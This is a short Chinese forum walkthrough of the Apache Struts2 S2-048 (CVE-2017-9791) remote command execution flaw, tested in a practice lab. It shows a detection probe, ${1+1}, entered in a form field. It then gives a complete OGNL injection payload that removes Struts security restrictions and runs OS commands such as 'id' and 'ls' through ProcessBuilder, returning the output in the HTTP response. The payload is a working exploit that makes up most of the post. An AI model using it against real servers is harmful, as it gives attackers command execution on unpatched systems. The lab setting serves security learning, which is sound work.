|
st2-048 远程命令执行
(CVE-2017-9791)
打开靶场
点击如上
在 Gangster Name 处输入${1+1},Gangster Age 和 Gangster Description 处随意填写
提交后发现漏洞存在
重新在如下界面提交抓包
Payload:须要 url 转码
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#
_memberAccess=#dm)(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognl
Util=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackag
eNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#is
win=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c
',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new
java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.str
uts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#proce
ss.getInputStream(),#ros)).(#ros.flush())}
红框为执行 id 命令
可以修改命令
改为 ls 查看
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|